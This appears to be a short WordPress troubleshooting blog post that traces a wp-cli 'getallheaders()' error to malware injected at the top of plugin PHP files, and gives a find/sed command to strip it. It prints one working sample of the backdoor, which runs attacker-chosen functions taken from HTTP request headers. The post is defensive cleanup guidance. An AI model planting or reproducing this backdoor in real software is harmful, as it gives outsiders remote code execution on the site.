Content Error or Suggest an Edit
Notice a grammatical error or technical inaccuracy? Let us know; we will give you credit!
Introduction
You came here because you’re running a wp-cli command get the following error
PHP Fatal error: Uncaught Error: Call to undefined function getallheaders() in
Removing Malicious Code in WordPress Plugins
In the case I was dealing with, all of the plugin files ending in .php had malicious code within them. Here is a good example.
<?php $_HEADERS=getallheaders();if(isset($_HEADERS['X-Dns-Prefetch-Control'])){$include=$_HEADERS['X-Dns-Prefetch-Control']('', $_HEADERS['Content-Security-Policy']($_HEADERS['If-Modified-Since']));$include();}
/**
* Custom Post Type UI.
*
You can remove this code by running the following command via SSH
find wp-content/plugins/ -type f -name "*.php" -exec sed -i '1s/<?php.*/<?php/' {} +
Your WordPress Site is Infected, Proceed with Clean-up
At this point, it’s clear your WordPress site is infected and you should go through everything and make sure that you clean up the infection.
Jordan Trask
With 20 years of experience in technology spanning Linux, Data Center Infrastructure, and related services and applications, Jordan consults with small, medium, and large organizations tackling technology problems and needs. With 10 years of experience in WordPress, he’s created Managing WP as a means of dumping his brain on the web.
Jordan operates LMT Solutions providing Technology Consulting Services and We Power WP for WordPress Care Plans and Support.